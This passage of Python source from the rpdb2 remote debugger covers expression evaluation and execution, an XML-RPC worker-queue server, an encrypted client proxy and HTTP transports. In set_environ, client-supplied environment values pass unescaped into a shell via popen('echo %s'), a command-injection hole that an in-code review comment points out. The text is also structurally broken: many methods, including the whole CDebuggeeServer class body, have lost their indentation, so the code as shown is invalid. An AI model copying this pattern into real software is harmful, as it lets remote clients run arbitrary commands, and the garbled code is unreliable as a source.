        # Children of a failed expression would fail too; skip them.
        if self.is_child_of_failure(failed_expr_list, expr):
            continue

        event = threading.Event()
        args = (expr, fExpand, filter_level, frame_index, fException, _globals, _locals, lock, event, rl, index, repr_limit, encoding)

        if self.m_fsynchronicity:
            g_server.m_work_queue.post_work_item(target = self.calc_expr, args = args, name = 'calc_expr %s' % expr)
        else:
            try:
                ctx = self.get_current_ctx()
                tid = ctx.m_thread_id
                send_job(tid, 0, self.calc_expr, *args)
            except:
                pass

        safe_wait(event, 2)

        lock.acquire()
        if len(rl) == index:
            # Timed out: fill this slot so a late worker result is
            # discarded, and remember the expression as failed.
            rl.append('error')
            failed_expr_list.append(expr)

        index += 1
        lock.release()

        if len(failed_expr_list) > 3:
            break

    _rl = [r for r in rl if r != 'error']

    return _rl
def evaluate(self, expr, frame_index, fException, encoding, fraw):
    """
    Evaluate expression in context of frame at depth 'frame-index'.
    Returns a (value, warning, error) triple of unicode strings.
    """
    result = [(as_unicode(''), as_unicode(STR_SYNCHRONICITY_BAD), as_unicode(''))]

    if self.m_fsynchronicity:
        self._evaluate(result, expr, frame_index, fException, encoding, fraw)
        return result[-1]

    # Asynchronous mode: run the evaluation on the debuggee thread.
    try:
        tid = self.get_current_ctx().m_thread_id
        send_job(tid, 1000, self._evaluate, result, expr, frame_index, fException, encoding, fraw)
    except:
        pass

    return result[-1]
def _evaluate(self, result, expr, frame_index, fException, encoding, fraw):
    """
    Evaluate expression in context of frame at depth 'frame-index'.
    Appends a (value, warning, error) unicode triple to 'result'.
    """
    encoding = self.__calc_encoding(encoding)

    (_globals, _locals, x) = self.__get_locals_globals(frame_index, fException)

    v = ''
    w = ''
    e = ''

    try:
        if '_rpdb2_pwd' in expr or '_rpdb2_args' in expr:
            # Never let the session password cross the wire.
            r = '...Removed-password-from-output...'

        else:
            # Prefix a coding declaration so the evaluated source is
            # decoded with the chosen encoding.
            _expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding, fstrict = True)

            if '_RPDB2_builtins' in expr:
                _locals['_RPDB2_builtins'] = vars(g_builtins_module)

            try:
                # Marker local: while bound, exception hooks redirect
                # exc_info to this evaluation - TODO confirm against the
                # hook implementation elsewhere in the file.
                redirect_exc_info = True
                r = eval(_expr, _globals, _locals)
            finally:
                del redirect_exc_info

            if '_RPDB2_builtins' in expr:
                del _locals['_RPDB2_builtins']

        if fraw:
            encoding = ENCODING_RAW_I

        v = repr_ltd(r, MAX_EVALUATE_LENGTH, encoding)

        if len(v) > MAX_EVALUATE_LENGTH:
            v += '... *** %s ***' % STR_MAX_EVALUATE_LENGTH_WARNING
            w = STR_MAX_EVALUATE_LENGTH_WARNING

    except:
        exc_info = sys.exc_info()
        e = "%s, %s" % (safe_str(exc_info[0]), safe_str(exc_info[1]))

    # The evaluation may have had side effects on the namespace.
    self.notify_namespace()

    result.append((as_unicode(v), as_unicode(w), as_unicode(e)))
def execute(self, suite, frame_index, fException, encoding):
    """
    Execute suite (Python statement) in context of frame at
    depth 'frame-index'.  Returns a (warning, error) pair.
    """
    result = [(as_unicode(STR_SYNCHRONICITY_BAD), as_unicode(''))]

    if self.m_fsynchronicity:
        self._execute(result, suite, frame_index, fException, encoding)
        return result[-1]

    # Asynchronous mode: run the statement on the debuggee thread.
    try:
        tid = self.get_current_ctx().m_thread_id
        send_job(tid, 1000, self._execute, result, suite, frame_index, fException, encoding)
    except:
        pass

    return result[-1]
def _execute(self, result, suite, frame_index, fException, encoding):
    """
    Execute suite (Python statement) in context of frame at
    depth 'frame-index'.  Appends a (warning, error) pair to 'result'.
    """
    print_debug('exec called with: ' + repr(suite))

    encoding = self.__calc_encoding(encoding)

    (_globals, _locals, _original_locals_copy) = self.__get_locals_globals(frame_index, fException)

    if frame_index > 0 and not _globals is _locals:
        # Snapshot locals of a non-top frame, so we can warn below if
        # the statement changed an existing local.
        _locals_copy = copy.copy(_locals)

    w = ''
    e = ''

    try:
        if '_RPDB2_FindRepr' in suite and not '_RPDB2_FindRepr' in _original_locals_copy:
            _locals['_RPDB2_FindRepr'] = _RPDB2_FindRepr

        try:
            # Prefix a coding declaration so the compiled source is
            # decoded with the chosen encoding.
            _suite = as_bytes(ENCODING_SOURCE % encoding + suite, encoding, fstrict = True)
            _code = compile(_suite, '<string>', 'exec')

            try:
                # Marker local: while bound, exception hooks redirect
                # exc_info to this execution - TODO confirm against the
                # hook implementation elsewhere in the file.
                redirect_exc_info = True
                exec(_code, _globals, _locals)
            finally:
                del redirect_exc_info

        finally:
            # Remove the helper we injected, if any.
            if '_RPDB2_FindRepr' in suite and not '_RPDB2_FindRepr' in _original_locals_copy:
                del _locals['_RPDB2_FindRepr']

    except:
        exc_info = sys.exc_info()
        e = "%s, %s" % (safe_str(exc_info[0]), safe_str(exc_info[1]))

    # Emit STR_LOCAL_NAMESPACE_WARNING when an existing local of a
    # non-top frame was modified (_locals_copy is bound exactly when
    # this condition's first two clauses hold).
    if frame_index > 0 and (not _globals is _locals) and _locals != _locals_copy:
        l = [(k, safe_repr(v)) for k, v in _locals.items()]
        sl = set(l)

        lc = [(k, safe_repr(v)) for k, v in _locals_copy.items()]
        slc = set(lc)

        nsc = [k for (k, v) in sl - slc if k in _original_locals_copy]
        if len(nsc) != 0:
            w = STR_LOCAL_NAMESPACE_WARNING

    # The statement may have had side effects on the namespace.
    self.notify_namespace()

    result.append((as_unicode(w), as_unicode(e)))
def __decode_thread_name(self, name):
    """Normalize a thread name to unicode."""
    return as_unicode(name)
def get_thread_list(self):
    """
    Return thread list with tid, state, and last event of each thread.
    """
    ctx = self.get_current_ctx()
    current_tid = -1 if ctx is None else ctx.m_thread_id

    descriptions = []
    for c in self.get_threads().values():
        descriptions.append({
            DICT_KEY_TID: c.m_thread_id,
            DICT_KEY_NAME: self.__decode_thread_name(c.m_thread_name),
            DICT_KEY_BROKEN: c.m_fBroken,
            DICT_KEY_EVENT: as_unicode(c.m_event),
        })

    return (current_tid, descriptions)
def stop_debuggee(self):
    """
    Notify the client and terminate this process via a worker thread.
    """
    g_server.m_work_queue.post_work_item(_atexit, (True, ), '_atexit')
def set_synchronicity(self, fsynchronicity):
    """Update the synchronicity flag and broadcast the change."""
    self.m_fsynchronicity = fsynchronicity
    self.m_event_dispatcher.fire_event(CEventSynchronicity(fsynchronicity))

    if self.m_state_manager.get_state() == STATE_BROKEN:
        self.notify_namespace()
def set_trap_unhandled_exceptions(self, ftrap):
    """Record the trap-unhandled-exceptions flag and notify listeners."""
    self.m_ftrap = ftrap
    self.m_event_dispatcher.fire_event(CEventTrap(ftrap))
def is_unhandled_exception(self):
    """Return the unhandled-exception flag of this debugger."""
    return self.m_fUnhandledException
def set_fork_mode(self, ffork_into_child, ffork_auto):
    """Record the fork-handling mode flags and notify listeners."""
    self.m_ffork_into_child = ffork_into_child
    self.m_ffork_auto = ffork_auto
    self.m_event_dispatcher.fire_event(CEventForkMode(ffork_into_child, ffork_auto))
def set_environ(self, envmap):
    """
    Apply (key, value) pairs from 'envmap' to os.environ.  Each value is
    first expanded by the shell (via 'echo %s'), so it may reference
    other environment variables.  If PYTHONPATH was among the keys,
    sys.path is recalculated afterwards.
    """
    global g_fignorefork

    print_debug('Entered set_environ() with envmap = %s' % repr(envmap))

    if len(envmap) == 0:
        return

    old_pythonpath = os.environ.get('PYTHONPATH', '')

    encoding = detect_locale()

    for k, v in envmap:
        try:
            k = as_string(k, encoding, fstrict = True)
            v = as_string(v, encoding, fstrict = True)
        except:
            # Skip pairs that cannot be decoded in the current locale.
            continue

        # NOTE(review): the value is expanded by handing it to a shell
        # 'echo'; a hostile envmap value could therefore execute
        # arbitrary commands.  envmap comes from the debugger client.
        command = 'echo %s' % v

        try:
            # Tell the fork hooks to ignore the fork done by popen.
            g_fignorefork = True
            f = platform.popen(command)

        finally:
            g_fignorefork = False

        value = f.read()
        f.close()

        # Strip the trailing newline added by echo.
        if value[-1:] == '\n':
            value = value[:-1]

        os.environ[k] = value

    if 'PYTHONPATH' in [k for (k, v) in envmap]:
        recalc_sys_path(old_pythonpath)
#
# ------------------------------------- RPC Server --------------------------------------------
#
class CWorkQueue:
    """
    Worker threads pool mechanism for RPC server.
    """

    def __init__(self, size = N_WORK_QUEUE_THREADS):
        # m_lock guards every member below and doubles as the
        # wait/notify condition for idle workers.
        self.m_lock = threading.Condition()

        self.m_work_items = []
        self.m_f_shutdown = False

        # Target number of pool threads; the pool may temporarily grow
        # beyond it (see __worker_target) and then shrinks back.
        self.m_size = size

        self.m_n_threads = 0
        self.m_n_available = 0

        self.__create_thread()

    def __create_thread(self):
        t = CThread(name = '__worker_target', target = self.__worker_target, shutdown = self.shutdown)
        t.start()

    def shutdown(self):
        """
        Signal worker threads to exit, and wait until they do.
        """
        if self.m_f_shutdown:
            return

        print_debug('Shutting down worker queue...')

        self.m_lock.acquire()
        self.m_f_shutdown = True
        lock_notify_all(self.m_lock)

        t0 = time.time()

        while self.m_n_threads > 0:
            if time.time() - t0 > SHUTDOWN_TIMEOUT:
                self.m_lock.release()
                print_debug('Shut down of worker queue has TIMED OUT!')
                return

            safe_wait(self.m_lock, 0.1)

        self.m_lock.release()
        print_debug('Shutting down worker queue, done.')

    def __worker_target(self):
        # Main loop of one pool thread: wait for work, run it, and spawn
        # an extra thread when the pool is about to run dry.
        try:
            self.m_lock.acquire()

            self.m_n_threads += 1
            self.m_n_available += 1

            # Keep pre-spawning until the configured size is reached.
            fcreate_thread = not self.m_f_shutdown and self.m_n_threads < self.m_size

            self.m_lock.release()

            if fcreate_thread:
                self.__create_thread()

            self.m_lock.acquire()

            while not self.m_f_shutdown:
                safe_wait(self.m_lock)

                if self.m_f_shutdown:
                    break

                if len(self.m_work_items) == 0:
                    continue

                # If we are the last idle worker, add one so the pool
                # can keep absorbing requests while we run this item.
                fcreate_thread = self.m_n_available == 1

                (target, args, name) = self.m_work_items.pop()

                self.m_n_available -= 1
                self.m_lock.release()

                if fcreate_thread:
                    print_debug('Creating an extra worker thread.')
                    self.__create_thread()

                thread_set_name(current_thread(), '__worker_target - ' + name)

                try:
                    target(*args)
                except:
                    print_debug_exception()

                thread_set_name(current_thread(), '__worker_target')

                self.m_lock.acquire()
                self.m_n_available += 1

                # Shrink the pool when there are surplus idle workers.
                if self.m_n_available > self.m_size:
                    break

            self.m_n_threads -= 1
            self.m_n_available -= 1

            # Wake shutdown() so it can observe m_n_threads dropping.
            lock_notify_all(self.m_lock)

        finally:
            self.m_lock.release()

    def post_work_item(self, target, args, name = ''):
        # Queue (target, args) for a pool thread; silently dropped when
        # the queue is shutting down.
        if self.m_f_shutdown:
            return

        try:
            self.m_lock.acquire()

            if self.m_f_shutdown:
                return

            self.m_work_items.append((target, args, name))

            self.m_lock.notify()

        finally:
            self.m_lock.release()
#
# MOD
#
class CUnTracedThreadingMixIn(SocketServer.ThreadingMixIn):
    """
    Modification of SocketServer.ThreadingMixIn that uses a worker thread
    queue instead of spawning threads to process requests.
    This mod was needed to resolve deadlocks that were generated in some
    circumstances.
    """

    def process_request(self, request, client_address):
        # Hand the request to the shared worker pool instead of starting
        # a fresh thread per request.
        handler = SocketServer.ThreadingMixIn.process_request_thread
        g_server.m_work_queue.post_work_item(target = handler, args = (self, request, client_address), name = 'process_request')
#
# MOD
#
def my_xmlrpclib_loads(data):
    """
    Modification of Python 2.3 xmlrpclib.loads() that does not do an
    import. Needed to prevent deadlocks.
    """
    parser, unmarshaller = xmlrpclib.getparser()
    parser.feed(data)
    parser.close()

    return unmarshaller.close(), unmarshaller.getmethodname()
#
# MOD
#
class CXMLRPCServer(CUnTracedThreadingMixIn, SimpleXMLRPCServer.SimpleXMLRPCServer):
    """
    Modification of Python 2.3 SimpleXMLRPCServer.SimpleXMLRPCDispatcher
    that uses my_xmlrpclib_loads(). Needed to prevent deadlocks.
    """

    # Allow quick rebinding of the listen port on POSIX systems.
    if os.name == POSIX:
        allow_reuse_address = True
    else:
        allow_reuse_address = False

    def __marshaled_dispatch(self, data, dispatch_method = None):
        # Like SimpleXMLRPCDispatcher._marshaled_dispatch, but parses
        # the request with my_xmlrpclib_loads() to avoid an import
        # deadlock.
        params, method = my_xmlrpclib_loads(data)

        # generate response
        try:
            if dispatch_method is not None:
                response = dispatch_method(method, params)
            else:
                response = self._dispatch(method, params)

            # wrap response in a singleton tuple
            response = (response,)
            response = xmlrpclib.dumps(response, methodresponse=1)

        except xmlrpclib.Fault:
            fault = sys.exc_info()[1]
            response = xmlrpclib.dumps(fault)

        except:
            # report exception back to server
            response = xmlrpclib.dumps(
                xmlrpclib.Fault(1, "%s:%s" % (sys.exc_type, sys.exc_value))
                )
            print_debug_exception()

        return response

    # On Python <= 2.3 the base dispatcher looks this method up under
    # the single-underscore name; alias the name-mangled method to it.
    if sys.version_info[:2] <= (2, 3):
        _marshaled_dispatch = __marshaled_dispatch

    def handle_error(self, request, client_address):
        # Skip error reporting within 5 seconds of the timestamp stored
        # in g_ignore_broken_pipe.
        print_debug("handle_error() in pid %d" % _getpid())

        if g_ignore_broken_pipe + 5 > time.time():
            return

        return SimpleXMLRPCServer.SimpleXMLRPCServer.handle_error(self, request, client_address)
class CPwdServerProxy:
    """
    Encrypted proxy to the debuggee.
    Works by wrapping a xmlrpclib.ServerProxy object.
    """

    def __init__(self, crypto, uri, transport = None, target_rid = 0):
        self.m_crypto = crypto
        self.m_proxy = xmlrpclib.ServerProxy(uri, transport)

        self.m_fEncryption = is_encryption_supported()
        self.m_target_rid = target_rid

        # The single remote dispatcher through which all calls travel.
        self.m_method = getattr(self.m_proxy, DISPACHER_METHOD)

    def __set_encryption(self, fEncryption):
        self.m_fEncryption = fEncryption

    def get_encryption(self):
        return self.m_fEncryption

    def __request(self, name, params):
        """
        Call debuggee method 'name' with parameters 'params'.
        """
        while True:
            try:
                #
                # Encrypt method and params.
                #
                fencrypt = self.get_encryption()
                args = (as_unicode(name), params, self.m_target_rid)
                (fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)

                rpdb_version = as_unicode(get_interface_compatibility_version())

                r = self.m_method(rpdb_version, fencrypt, fcompress, digest, msg)
                (fencrypt, fcompress, digest, msg) = r

                #
                # Decrypt response.
                #
                ((max_index, _r, _e), id) = self.m_crypto.undo_crypto(fencrypt, fcompress, digest, msg, fVerifyIndex = False)

                if _e is not None:
                    # Remote exceptions travel inside the encrypted
                    # payload; re-raise them locally.
                    raise _e

            except AuthenticationBadIndex:
                # Resync the crypto index with the server and retry.
                e = sys.exc_info()[1]
                self.m_crypto.set_index(e.m_max_index, e.m_anchor)
                continue

            except xmlrpclib.Fault:
                # Map well-known fault strings back to typed exceptions.
                fault = sys.exc_info()[1]
                if class_name(BadVersion) in fault.faultString:
                    s = fault.faultString.split("'")
                    version = ['', s[1]][len(s) > 0]
                    raise BadVersion(version)

                if class_name(EncryptionExpected) in fault.faultString:
                    raise EncryptionExpected

                elif class_name(EncryptionNotSupported) in fault.faultString:
                    if self.m_crypto.m_fAllowUnencrypted:
                        # Fall back to plaintext and retry the call.
                        self.__set_encryption(False)
                        continue

                    raise EncryptionNotSupported

                elif class_name(DecryptionFailure) in fault.faultString:
                    raise DecryptionFailure

                elif class_name(AuthenticationBadData) in fault.faultString:
                    raise AuthenticationBadData

                elif class_name(AuthenticationFailure) in fault.faultString:
                    raise AuthenticationFailure

                else:
                    print_debug_exception()
                    assert False

            except xmlrpclib.ProtocolError:
                print_debug("Caught ProtocolError for %s" % name)
                raise CConnectionException

            return _r

    def __getattr__(self, name):
        # Expose remote methods as attributes, xmlrpclib style.
        return xmlrpclib._Method(self.__request, name)
class CIOServer:
    """
    Base class for debuggee server.
    """

    def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid):
        # _rpdb2_pwd - session password; rid - server id string.
        assert(is_unicode(_rpdb2_pwd))
        assert(is_unicode(rid))

        self.m_thread = None

        self.m_crypto = CCrypto(_rpdb2_pwd, fAllowUnencrypted, rid)

        self.m_fAllowRemote = fAllowRemote
        self.m_rid = rid

        self.m_port = None
        self.m_stop = False
        self.m_server = None
        self.m_work_queue = None

    def shutdown(self):
        self.stop()

    def start(self):
        # Serve on a daemon thread so it cannot block interpreter exit.
        self.m_thread = CThread(name = 'ioserver', target = self.run, shutdown = self.shutdown)
        thread_set_daemon(self.m_thread, True)
        self.m_thread.start()

    def jumpstart(self):
        # Restart serving after a previous stop().
        self.m_stop = False
        self.start()

    def stop(self):
        if self.m_stop:
            return

        print_debug('Stopping IO server... (pid = %d)' % _getpid())

        self.m_stop = True

        # handle_request() blocks, so poke the server with no-op
        # requests until the serving thread notices m_stop and exits.
        while thread_is_alive(self.m_thread):
            try:
                proxy = CPwdServerProxy(self.m_crypto, calcURL(LOOPBACK, self.m_port), CLocalTimeoutTransport())
                proxy.null()
            except (socket.error, CException):
                pass

            self.m_thread.join(0.5)

        self.m_thread = None

        self.m_work_queue.shutdown()

        print_debug('Stopping IO server, done.')

    def export_null(self):
        # No-op RPC used as a wakeup/heartbeat.
        return 0

    def run(self):
        if self.m_server == None:
            (self.m_port, self.m_server) = self.__StartXMLRPCServer()

        self.m_work_queue = CWorkQueue()

        self.m_server.register_function(self.dispatcher_method)

        while not self.m_stop:
            self.m_server.handle_request()

    def dispatcher_method(self, rpdb_version, fencrypt, fcompress, digest, msg):
        """
        Process RPC call.
        """
        if rpdb_version != as_unicode(get_interface_compatibility_version()):
            raise BadVersion(as_unicode(get_version()))

        try:
            try:
                #
                # Decrypt parameters.
                #
                ((name, __params, target_rid), client_id) = self.m_crypto.undo_crypto(fencrypt, fcompress, digest, msg)

            except AuthenticationBadIndex:
                e = sys.exc_info()[1]

                #
                # Notify the caller on the expected index.
                #
                max_index = self.m_crypto.get_max_index()
                args = (max_index, None, e)
                (fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
                return (fencrypt, fcompress, digest, msg)

            r = None
            e = None

            try:
                #
                # We are forcing the 'export_' prefix on methods that are
                # callable through XML-RPC to prevent potential security
                # problems
                #
                func = getattr(self, 'export_' + name)
            except AttributeError:
                raise Exception('method "%s" is not supported' % ('export_' + name))

            try:
                # A non-zero target_rid must match this server's id.
                if (target_rid != 0) and (target_rid != self.m_rid):
                    raise NotAttached

                #
                # Record that client id is still attached.
                #
                self.record_client_heartbeat(client_id, name, __params)

                r = func(*__params)

            except Exception:
                # Exceptions travel back inside the encrypted reply
                # rather than through the XML-RPC fault channel.
                _e = sys.exc_info()[1]
                print_debug_exception()
                e = _e

            #
            # Send the encrypted result.
            #
            max_index = self.m_crypto.get_max_index()
            args = (max_index, r, e)
            (fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
            return (fencrypt, fcompress, digest, msg)

        except:
            print_debug_exception()
            raise

    def __StartXMLRPCServer(self):
        """
        As the name says, start the XML RPC server.
        Looks for an available tcp port to listen on.
        """
        # Bind all interfaces only when remote access is allowed.
        host = [LOOPBACK, ""][self.m_fAllowRemote]
        port = SERVER_PORT_RANGE_START

        while True:
            try:
                server = CXMLRPCServer((host, port), logRequests = 0)
                return (port, server)

            except socket.error:
                e = sys.exc_info()[1]
                if GetSocketError(e) != errno.EADDRINUSE:
                    raise

                if port >= SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH - 1:
                    raise

                port += 1
                continue

    def record_client_heartbeat(self, id, name, params):
        # Overridden by subclasses that track client liveness.
        pass
class CServerInfo(object):
    """Identity snapshot of a debuggee server, sent to clients."""

    def __init__(self, age, port, pid, filename, rid, state, fembedded):
        assert(is_unicode(rid))

        fs_encoding = sys.getfilesystemencoding()

        self.m_age = age
        self.m_port = port
        self.m_pid = pid
        self.m_filename = as_unicode(filename, fs_encoding)
        self.m_module_name = as_unicode(CalcModuleName(filename), fs_encoding)
        self.m_rid = rid
        self.m_state = as_unicode(state)
        self.m_fembedded = fembedded

    def __reduce__(self):
        # Pickle via __newobj__ so unpickling does not rerun __init__.
        return (copy_reg.__newobj__, (type(self), ), vars(self), None, None)

    def __str__(self):
        return 'age: %d, port: %d, pid: %d, filename: %s, rid: %s' % (self.m_age, self.m_port, self.m_pid, self.m_filename, self.m_rid)
class CDebuggeeServer(CIOServer):
"""
The debuggee XML RPC server class.
"""
def __init__(self, filename, debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid = None):
if rid is None:
rid = generate_rid()
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
CIOServer.__init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid)
self.m_filename = filename
self.m_pid = _getpid()
self.m_time = time.time()
self.m_debugger = debugger
self.m_rid = rid
def shutdown(self):
CIOServer.shutdown(self)
def record_client_heartbeat(self, id, name, params):
finit = (name == 'request_break')
fdetach = (name == 'request_go' and True in params)
self.m_debugger.record_client_heartbeat(id, finit, fdetach)
def export_null(self):
return self.m_debugger.send_event_null()
def export_server_info(self):
age = time.time() - self.m_time
state = self.m_debugger.get_state()
fembedded = self.m_debugger.is_embedded()
si = CServerInfo(age, self.m_port, self.m_pid, self.m_filename, self.m_rid, state, fembedded)
return si
def export_sync_with_events(self, fException, fSendUnhandled):
ei = self.m_debugger.sync_with_events(fException, fSendUnhandled)
return ei
def export_wait_for_event(self, timeout, event_index):
(new_event_index, s) = self.m_debugger.wait_for_event(timeout, event_index)
return (new_event_index, s)
def export_set_breakpoint(self, filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding):
self.m_debugger.set_breakpoint(filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding)
return 0
def export_disable_breakpoint(self, id_list, fAll):
self.m_debugger.disable_breakpoint(id_list, fAll)
return 0
def export_enable_breakpoint(self, id_list, fAll):
self.m_debugger.enable_breakpoint(id_list, fAll)
return 0
def export_delete_breakpoint(self, id_list, fAll):
self.m_debugger.delete_breakpoint(id_list, fAll)
return 0
def export_get_breakpoints(self):
bpl = self.m_debugger.get_breakpoints()
return bpl
def export_request_break(self):
self.m_debugger.request_break()
return 0
def export_request_go(self, fdetach = False):
self.m_debugger.request_go()
return 0
def export_request_go_breakpoint(self, filename, scope, lineno, frame_index, fException):
self.m_debugger.request_go_breakpoint(filename, scope, lineno, frame_index, fException)
return 0
def export_request_step(self):
self.m_debugger.request_step()
return 0
def export_request_next(self):
    """Step over the current statement; returns 0."""
    self.m_debugger.request_next()
    return 0
def export_request_return(self):
    """Run until the current frame returns; returns 0."""
    self.m_debugger.request_return()
    return 0
def export_request_jump(self, lineno):
    """Jump to lineno in the current frame; returns 0."""
    self.m_debugger.request_jump(lineno)
    return 0
def export_get_stack(self, tid_list, fAll, fException):
    """Return stack traces for the requested threads."""
    r = self.m_debugger.get_stack(tid_list, fAll, fException)
    return r
def export_get_source_file(self, filename, lineno, nlines, frame_index, fException):
    """Return source lines of filename around lineno."""
    r = self.m_debugger.get_source_file(filename, lineno, nlines, frame_index, fException)
    return r
def export_get_source_lines(self, nlines, fAll, frame_index, fException):
    """Return source lines around the current position."""
    r = self.m_debugger.get_source_lines(nlines, fAll, frame_index, fException)
    return r
def export_get_thread_list(self):
    """Return the debuggee's thread list."""
    r = self.m_debugger.get_thread_list()
    return r
def export_set_thread(self, tid):
    """Select tid as the focused broken thread; returns 0."""
    self.m_debugger.set_thread(tid)
    return 0
def export_get_namespace(self, nl, filter_level, frame_index, fException, repr_limit, encoding, fraw):
    """Return namespace (variable) data for the given frame."""
    r = self.m_debugger.get_namespace(nl, filter_level, frame_index, fException, repr_limit, encoding, fraw)
    return r
def export_evaluate(self, expr, frame_index, fException, encoding, fraw):
    """Evaluate expr in the given frame; return (value, warning, error)."""
    (v, w, e) = self.m_debugger.evaluate(expr, frame_index, fException, encoding, fraw)
    return (v, w, e)
def export_execute(self, suite, frame_index, fException, encoding):
    """Execute a statement suite in the given frame; return (warning, error)."""
    (w, e) = self.m_debugger.execute(suite, frame_index, fException, encoding)
    return (w, e)
def export_stop_debuggee(self):
    """Terminate the debugged program; returns 0."""
    self.m_debugger.stop_debuggee()
    return 0
def export_set_synchronicity(self, fsynchronicity):
    """Set the synchronicity policy flag; returns 0."""
    self.m_debugger.set_synchronicity(fsynchronicity)
    return 0
def export_set_trap_unhandled_exceptions(self, ftrap):
    """Enable/disable trapping of unhandled exceptions; returns 0."""
    self.m_debugger.set_trap_unhandled_exceptions(ftrap)
    return 0
def export_is_unhandled_exception(self):
    """Return whether the debuggee is broken on an unhandled exception."""
    return self.m_debugger.is_unhandled_exception()
def export_set_fork_mode(self, ffork_into_child, ffork_auto):
    """Set fork-handling policy flags; returns 0."""
    self.m_debugger.set_fork_mode(ffork_into_child, ffork_auto)
    return 0
def export_set_environ(self, envmap):
    """Apply environment variable overrides to the debuggee; returns 0."""
    self.m_debugger.set_environ(envmap)
    return 0
def export_embedded_sync(self):
    """Synchronization hook for embedded debugging; returns 0."""
    self.m_debugger.embedded_sync()
    return 0
#
# ------------------------------------- RPC Client --------------------------------------------
#
#
# MOD
#
class CTimeoutHTTPConnection(httplib.HTTPConnection):
    """
    Modification of httplib.HTTPConnection with timeout for sockets.
    """
    # Socket timeout (seconds) applied to every connection.
    _rpdb2_timeout = PING_TIMEOUT
    def connect(self):
        """Connect to the host and port specified in __init__."""
        # New Python version of connect(): the base class honors a
        # 'timeout' attribute natively, so set it and delegate.
        if hasattr(self, 'timeout'):
            self.timeout = self._rpdb2_timeout
            return httplib.HTTPConnection.connect(self)
        # Old Python version of connect(): resolve and connect manually
        # so settimeout() can be applied to the raw socket.
        msg = "getaddrinfo returns an empty list"
        for res in socket.getaddrinfo(self.host, self.port, 0, socket.SOCK_STREAM):
            af, socktype, proto, canonname, sa = res
            try:
                self.sock = socket.socket(af, socktype, proto)
                self.sock.settimeout(self._rpdb2_timeout)
                if self.debuglevel > 0:
                    print_debug("connect: (%s, %s)" % (self.host, self.port))
                self.sock.connect(sa)
            except socket.error:
                # Remember the failure and try the next resolved address.
                msg = sys.exc_info()[1]
                if self.debuglevel > 0:
                    print_debug('connect fail: ' + repr((self.host, self.port)))
                if self.sock:
                    self.sock.close()
                self.sock = None
                continue
            break
        if not self.sock:
            # Every candidate address failed; raise the last error seen.
            raise socket.error(msg)
#
# MOD
#
class CLocalTimeoutHTTPConnection(CTimeoutHTTPConnection):
    """
    HTTP connection used for same-machine sessions: identical to
    CTimeoutHTTPConnection except that the (shorter) local socket
    timeout is applied.
    """
    _rpdb2_timeout = LOCAL_TIMEOUT
# httplib.HTTP does not exist on Python 3; provide an empty stand-in so
# the CTimeoutHTTP/CLocalTimeoutHTTP class statements below still parse.
if is_py3k():
    class httplib_HTTP(object):
        pass
else:
    httplib_HTTP = httplib.HTTP
#
# MOD
#
class CTimeoutHTTP(httplib_HTTP):
    """
    Legacy httplib.HTTP wrapper whose connections carry the standard
    rpdb2 socket timeout (see CTimeoutHTTPConnection).
    """
    _connection_class = CTimeoutHTTPConnection
#
# MOD
#
class CLocalTimeoutHTTP(httplib_HTTP):
    """
    Legacy httplib.HTTP wrapper whose connections carry the shorter
    local-machine socket timeout (see CLocalTimeoutHTTPConnection).
    """
    _connection_class = CLocalTimeoutHTTPConnection
#
# MOD
#
class CLocalTransport(xmlrpclib.Transport):
    """
    Modification of xmlrpclib.Transport to work around Zonealarm sockets
    bug.
    """
    _connection_class = httplib.HTTPConnection
    _connection_class_old = httplib_HTTP
    def make_connection(self, host):
        """Return a NEW connection object for every request."""
        # New Python version of connect().
        # make_connection is deliberately hacked to always create a new
        # connection: otherwise all threads would share one cached
        # connection and crash.
        if hasattr(self, '_connection'):
            chost, self._extra_headers, x509 = self.get_host_info(host)
            return self._connection_class(chost)
        # Old Python version of connect().
        # create a HTTP connection object from a host descriptor
        host, extra_headers, x509 = self.get_host_info(host)
        return self._connection_class_old(host)
    def __parse_response(self, file, sock):
        """Polling variant of response parsing (installed on Windows
        only, see the class-level alias below)."""
        # read response from input file/socket, and parse it
        p, u = self.getparser()
        while 1:
            if sock:
                response = sock.recv(1024)
            else:
                # Brief sleep keeps this read loop from spinning while
                # the buffered file object catches up.
                time.sleep(0.002)
                response = file.read(1024)
            if not response:
                break
            if self.verbose:
                _print("body: " + repr(response))
            p.feed(response)
        file.close()
        p.close()
        return u.close()
    # On Windows only, override the base class' _parse_response with the
    # polling variant above (note the name-mangled private reference).
    if os.name == 'nt':
        _parse_response = __parse_response
#
# MOD
#
class CTimeoutTransport(CLocalTransport):
    """
    XML-RPC transport whose connections use the standard rpdb2 socket
    timeout; inherits the per-request connection behavior of
    CLocalTransport.
    """
    _connection_class = CTimeoutHTTPConnection
    _connection_class_old = CTimeoutHTTP
#
# MOD
#
class CLocalTimeoutTransport(CLocalTransport):
    """
    XML-RPC transport whose connections use the shorter local-machine
    socket timeout; inherits the per-request connection behavior of
    CLocalTransport.
    """
    _connection_class = CLocalTimeoutHTTPConnection
    _connection_class_old = CLocalTimeoutHTTP
class CSession:
    """
    Basic class that communicates with the debuggee server.

    Holds the handshake proxy state and restart/shutdown flags consulted
    by the session manager's event-monitor thread.
    """
    def __init__(self, host, port, _rpdb2_pwd, fAllowUnencrypted, rid):
        self.m_crypto = CCrypto(_rpdb2_pwd, fAllowUnencrypted, rid)
        self.m_host = host
        self.m_port = port
        self.m_proxy = None          # set by Connect()
        self.m_server_info = None    # set by Connect()
        self.m_exc_info = None       # sys.exc_info() captured by ConnectNoThrow()
        self.m_fShutDown = False
        self.m_fRestart = False
    def get_encryption(self):
        """Return whether the proxy channel is encrypted."""
        return self.m_proxy.get_encryption()
    def getServerInfo(self):
        """Return the server info captured at Connect() time (or None)."""
        return self.m_server_info
    def pause(self):
        """Make getProxy() block until restart() completes."""
        self.m_fRestart = True
    def restart(self, sleep = 0, timeout = 10):
        """Reconnect to the server, retrying for up to timeout seconds.

